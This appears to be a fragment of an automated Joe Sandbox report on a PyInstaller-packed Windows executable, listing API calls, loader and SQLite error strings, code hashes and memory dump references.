                                                                                                                                                                                                                                                • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                                                                                                                • String ID: P%
                                                                                                                                                                                                                                                • API String ID: 2147705588-2959514604
                                                                                                                                                                                                                                                • Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                                                • Instruction ID: b69ec6ad47f99b26d8d78d5c386557fc31bd60fa7cc845e6c07e3b35e5390eb2
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2351F536604BA187D634AF22B4581BAB7A1F798B61F004121EFDF43694DF3CD146CB20
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: LongWindow$BlockCreateErrorLastReasonShutdown
                                                                                                                                                                                                                                                • String ID: Needs to remove its temporary files.
                                                                                                                                                                                                                                                • API String ID: 3975851968-2863640275
                                                                                                                                                                                                                                                • Opcode ID: 1b4b32be61da5f45784fe9fe2f7d724fb74bbaf2a32eb33803c40e4204126e7e
                                                                                                                                                                                                                                                • Instruction ID: 86d7806d4dccd00ecdf22ea55be2873d6fcdad52cfb7b10f5740765c9b675272
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1b4b32be61da5f45784fe9fe2f7d724fb74bbaf2a32eb33803c40e4204126e7e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 98218861B09A42C3E756AF7AF894179E251EFD8FB0F884131DE2E437D4DE2CD6528620
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2668800317.00007FFD94621000.00000040.00000001.01000000.00000013.sdmp, Offset: 00007FFD94620000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2668762753.00007FFD94620000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2668800317.00007FFD94682000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2668800317.00007FFD946CE000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2668800317.00007FFD946D2000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2668800317.00007FFD946D7000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2668800317.00007FFD9472F000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2668800317.00007FFD94734000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2668800317.00007FFD94737000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669246979.00007FFD94738000.00000080.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669284338.00007FFD9473A000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffd94620000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 349153199-0
                                                                                                                                                                                                                                                • Opcode ID: ba629577db6599826cb9fb44cf19b8c727e776d8ab71a1e0ce86f35fe3adb7c8
                                                                                                                                                                                                                                                • Instruction ID: 1105e295ebf496d9ff97f3bc51aed169afd82ed6132a369453ca98aa86a0012b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ba629577db6599826cb9fb44cf19b8c727e776d8ab71a1e0ce86f35fe3adb7c8
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C3817BA0F08247A6F6749BE6A4E12F92290AF47780F54C435D96CC77A7DE3CE845C710
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2669354495.00007FFD94741000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00007FFD94740000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669319396.00007FFD94740000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669354495.00007FFD94899000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669354495.00007FFD9489B000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669354495.00007FFD948B0000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669587652.00007FFD948B2000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669627059.00007FFD948B4000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffd94740000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: 00007C0619
                                                                                                                                                                                                                                                • String ID: cannot open %s column for writing$cannot open table without rowid: %s$cannot open view: %s$cannot open virtual table: %s$foreign key$indexed$no such column: "%s"$out of memory
                                                                                                                                                                                                                                                • API String ID: 3344901894-554953066
                                                                                                                                                                                                                                                • Opcode ID: 8fb5a4ad7f386661572e50f4d71446c1a6b03b0938a1a7950b2fa449bafe7a10
                                                                                                                                                                                                                                                • Instruction ID: ce7770a8b536a0857ee10c7ede7a97be621773b2fc7eb5f2eb33c6c519326c0f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8fb5a4ad7f386661572e50f4d71446c1a6b03b0938a1a7950b2fa449bafe7a10
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5832AD72B08BC9C6EBA4CFA594E06B937A4FB46B88F418135DA4D47796DF38E450C780
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID: -$:$f$p$p
                                                                                                                                                                                                                                                • API String ID: 3215553584-2013873522
                                                                                                                                                                                                                                                • Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                                                • Instruction ID: 4abb384f242921e5caf117a6d7df74cc094bcb271b34403e32910553b9a08c28
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 02128062A0C25387FB207E94F155279F6A1FBD0F60FD44535E68A46AC4DF3CE5828B20
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID: f$f$p$p$f
                                                                                                                                                                                                                                                • API String ID: 3215553584-1325933183
                                                                                                                                                                                                                                                • Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                                                • Instruction ID: 5478132b5a48bde4f3d31b9344c6de7f427e734b29c478a26098793db5f17028
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 031261B1A4C14387FB20BE95B054679F261EBC0FB4FD84035D69946AC4DF7CE882AB21
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                                • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                                • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                                • Opcode ID: e30da66bd449e278f4e1a8a1da43a6fc232ee02027dbecaf9a0becaf305aee32
                                                                                                                                                                                                                                                • Instruction ID: 67127a4641d1bf354300442f931eb79464fd7d3ecc53737f83b1d70d28718333
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e30da66bd449e278f4e1a8a1da43a6fc232ee02027dbecaf9a0becaf305aee32
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2E4169A2A0865283EA10FF62B8416B9A395ABC4FE4FD54431ED1D47796DE3CE1078760
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetTempPathW.KERNEL32(?,?,00000000,00007FF7C71B3CBB), ref: 00007FF7C71B88F4
                                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,00000000,00007FF7C71B3CBB), ref: 00007FF7C71B88FA
                                                                                                                                                                                                                                                • CreateDirectoryW.KERNEL32(?,00000000,00007FF7C71B3CBB), ref: 00007FF7C71B893C
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7C71B8A20: GetEnvironmentVariableW.KERNEL32(00007FF7C71B388E), ref: 00007FF7C71B8A57
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7C71B8A20: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF7C71B8A79
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7C71C82A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7C71C82C1
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7C71B2810: MessageBoxW.USER32 ref: 00007FF7C71B28EA
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                                                                                                                                                                                                                • API String ID: 3563477958-1339014028
                                                                                                                                                                                                                                                • Opcode ID: 6ea14b1c2d16789ddeaa0d8cc05df9935aa6d91fa7ad17376743f3d33dced37a
                                                                                                                                                                                                                                                • Instruction ID: ec5bfb5899b85b3e7ad5484b1e45a380087749ebb51df6dd078f1317718654c1
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6ea14b1c2d16789ddeaa0d8cc05df9935aa6d91fa7ad17376743f3d33dced37a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BE41B261A1964243FA11BF66B8962F992A0AFC9FA0FC04031DD0D4779ADE3CE5078760
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                                • String ID: csm$csm$csm
                                                                                                                                                                                                                                                • API String ID: 849930591-393685449
                                                                                                                                                                                                                                                • Opcode ID: b3973e9ed2b821368333a922871466498bda8290f9160b5e7eff6497ccad0325
                                                                                                                                                                                                                                                • Instruction ID: a642eb1b9395f5677efa44121c080aac7778333b7e7bdf810118405a9d7ae0a3
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b3973e9ed2b821368333a922871466498bda8290f9160b5e7eff6497ccad0325
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 97D1C4B2A0874187EB20EF64E4413ADB7A4FB85BA8F840135EE8D57B95CF38E156C710
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,?,?,00007FF7C71CF11A,?,?,000001C877BE6668,00007FF7C71CADC3,?,?,?,00007FF7C71CACBA,?,?,?,00007FF7C71C5FAE), ref: 00007FF7C71CEEFC
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,?,?,00007FF7C71CF11A,?,?,000001C877BE6668,00007FF7C71CADC3,?,?,?,00007FF7C71CACBA,?,?,?,00007FF7C71C5FAE), ref: 00007FF7C71CEF08
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                                                • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                • API String ID: 3013587201-537541572
                                                                                                                                                                                                                                                • Opcode ID: 2820b76ab0802fc58bac5aaef12ed6f6fffcf0c29b30edae647068643d5e49cf
                                                                                                                                                                                                                                                • Instruction ID: 4f0361497c197a877d9f78481c4e2f4a0ae586d01af83d02d19e700cfb4477c8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2820b76ab0802fc58bac5aaef12ed6f6fffcf0c29b30edae647068643d5e49cf
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6B41E321B1960243FA16EF56B804575A399BF88FF0FD84539DD1D57784EE3CE50A8320
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF7C71B3706,?,00007FF7C71B3804), ref: 00007FF7C71B2C9E
                                                                                                                                                                                                                                                • FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF7C71B3706,?,00007FF7C71B3804), ref: 00007FF7C71B2D63
                                                                                                                                                                                                                                                • MessageBoxW.USER32 ref: 00007FF7C71B2D99
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Message$CurrentFormatProcess
                                                                                                                                                                                                                                                • String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
                                                                                                                                                                                                                                                • API String ID: 3940978338-251083826
                                                                                                                                                                                                                                                • Opcode ID: 5cbcdbf458937bec5e084182eea0cc5ea1ed3b872b1d9e6a561cbd57b4752a27
                                                                                                                                                                                                                                                • Instruction ID: c7874b6e1f3c0e2f740e3ef0c920de6f20d07722c257f8f0df6a6739500b376a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5cbcdbf458937bec5e084182eea0cc5ea1ed3b872b1d9e6a561cbd57b4752a27
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E731B662B08A4143E621AF15B8542AAA695BFC8BE8F814135DF4E93759DE3CD60BC710
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(?,?,?,00007FF7C71BDFEA,?,?,?,00007FF7C71BDCDC,?,?,?,00007FF7C71BD8D9), ref: 00007FF7C71BDDBD
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,00007FF7C71BDFEA,?,?,?,00007FF7C71BDCDC,?,?,?,00007FF7C71BD8D9), ref: 00007FF7C71BDDCB
                                                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(?,?,?,00007FF7C71BDFEA,?,?,?,00007FF7C71BDCDC,?,?,?,00007FF7C71BD8D9), ref: 00007FF7C71BDDF5
                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,?,?,00007FF7C71BDFEA,?,?,?,00007FF7C71BDCDC,?,?,?,00007FF7C71BD8D9), ref: 00007FF7C71BDE63
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,?,?,00007FF7C71BDFEA,?,?,?,00007FF7C71BDCDC,?,?,?,00007FF7C71BD8D9), ref: 00007FF7C71BDE6F
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                                                • String ID: api-ms-
                                                                                                                                                                                                                                                • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                                                • Opcode ID: 7dacba43e0eeea41cb86842b35fa5572bc178a215ab50afad80fbb9160df823c
                                                                                                                                                                                                                                                • Instruction ID: ba0473aa731bf7e42cd85fbf2bf0c8852bc16cdb4feb7f1355fe2df894286e21
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7dacba43e0eeea41cb86842b35fa5572bc178a215ab50afad80fbb9160df823c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4631C361B2A60286EE2AAF42B841575A394FF98FB0FC94135DD5D17380EF3CE4468724
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF7C71B351A,?,00000000,00007FF7C71B3F23), ref: 00007FF7C71B2AA0
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                                • String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                                                • API String ID: 2050909247-2900015858
                                                                                                                                                                                                                                                • Opcode ID: 2c88a21be5af21f56a68c86fdca39687fee9058fd376c6caa55945c458c4d180
                                                                                                                                                                                                                                                • Instruction ID: 6b5531451ddfac0b76ca5acae421f9e055fb2d1d851ddc85a51b2d2b1c47eff7
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2c88a21be5af21f56a68c86fdca39687fee9058fd376c6caa55945c458c4d180
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6D218372A1978183E621AF51B4817E6A394FBC8BE4F800135EE8D43659DF3CD6468750
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
